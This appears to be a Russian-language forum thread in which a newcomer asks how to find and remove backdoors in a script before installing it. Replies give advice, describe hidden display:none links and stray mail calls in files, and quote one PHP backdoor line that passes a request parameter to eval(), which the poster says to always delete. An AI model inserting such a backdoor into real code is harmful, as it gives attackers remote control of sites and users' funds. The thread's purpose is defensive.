Автор Тема: Вопрос Как найти дыры и убрать их  (Прочитано 369 раз)

0 Пользователей и 1 Гость просматривают эту тему.

TheBagerYTАвтор темы

  • *
  • Оффлайн
  • Дата регистрации: Март 2018
  • Сообщений: 1
  • Страна: ru
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
Как найти дыры и убрать их
« : 25 Марта 2018, 21:13:13 »
Нет оценки
Что делать читал темы на сайте и видел что писали про дыры в скрипте хочу поставить скрипт, но боюсь что могут деньги украсть как их найти и убрать?
 

shans5

  • *
  • *
  • Оффлайн
  • Награды Три года на форуме !!! Репутация  более 25 Более 500 созданных тем Более 2500 сообщений Бывает груб к участникам форума. За время в онлайне на форуме
  • Дата регистрации: Сен. 2015
  • Расположение: Регион 58
  • Возраст: 39
  • Сообщений: 2950
  • Страна: ru
  • Поблагодарили: 271 раз(а)
  • Репутация +45/-4
  • Пол: Мужской
  • Всё только начинается !!!
  • Дата рождения:1979-06-30
    • Награды
Как найти дыры и убрать их
« Ответ #1 : 25 Марта 2018, 21:19:15 »
Нет оценки
Если самостоятельно, то  читать очень-очень много информации,
Пролазить все аналогичные форумы,
Завязать знакомство с знающими людьми(что не легко сделать)  :not speak:
Ну и так далее...
Если скрипт ФФ, то на яндекс диск и ссылку в личку
Подвергнуть критике, может любой.
Создать то,что будет подвергнуто критике,дано не каждому.

 

goodwin

  • *
  • Оффлайн
  • Награды Репутация более 5 Более 50 сообщений Активный участник голосований за форум
  • Дата регистрации: Дек. 2017
  • Сообщений: 91
  • Страна: ru
  • Поблагодарили: 6 раз(а)
  • Репутация +6/-0
  • Пол: Мужской
    • Награды
Как найти дыры и убрать их
« Ответ #2 : 25 Марта 2018, 21:58:23 »
Нет оценки
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
такой код всегда удаляй.
 

shans5

  • *
  • *
  • Оффлайн
  • Награды Три года на форуме !!! Репутация  более 25 Более 500 созданных тем Более 2500 сообщений Бывает груб к участникам форума. За время в онлайне на форуме
  • Дата регистрации: Сен. 2015
  • Расположение: Регион 58
  • Возраст: 39
  • Сообщений: 2950
  • Страна: ru
  • Поблагодарили: 271 раз(а)
  • Репутация +45/-4
  • Пол: Мужской
  • Всё только начинается !!!
  • Дата рождения:1979-06-30
    • Награды
Как найти дыры и убрать их
« Ответ #3 : 25 Марта 2018, 22:14:25 »
Нет оценки
такой код всегда удаляй.

 -)::-
Очень старая тема, там минимум инфы, но всё таки....

тут
 

goodwin

  • *
  • Оффлайн
  • Награды Репутация более 5 Более 50 сообщений Активный участник голосований за форум
  • Дата регистрации: Дек. 2017
  • Сообщений: 91
  • Страна: ru
  • Поблагодарили: 6 раз(а)
  • Репутация +6/-0
  • Пол: Мужской
    • Награды
Как найти дыры и убрать их
« Ответ #4 : 25 Марта 2018, 22:23:41 »
Нет оценки
 -)::-
Очень старая тема, там минимум инфы, но всё таки....

тут
вот еще что замечал, кода нет на словах расскажу. Я в файлах не обращал внимания сильно, на горизонтальный скрол, а потом смотрю, вроде код маленький а скрол есть, глянул и тут понеслось, какие-то ссылки со стилем дисплей ноне) сорян за русский))) потом еще какие-то mail с квадратиками. Теперь вот и не уверен, что я сам подшаманил скрипт)
 
Теги:
 

Имя пользователя:
Пароль:
Session: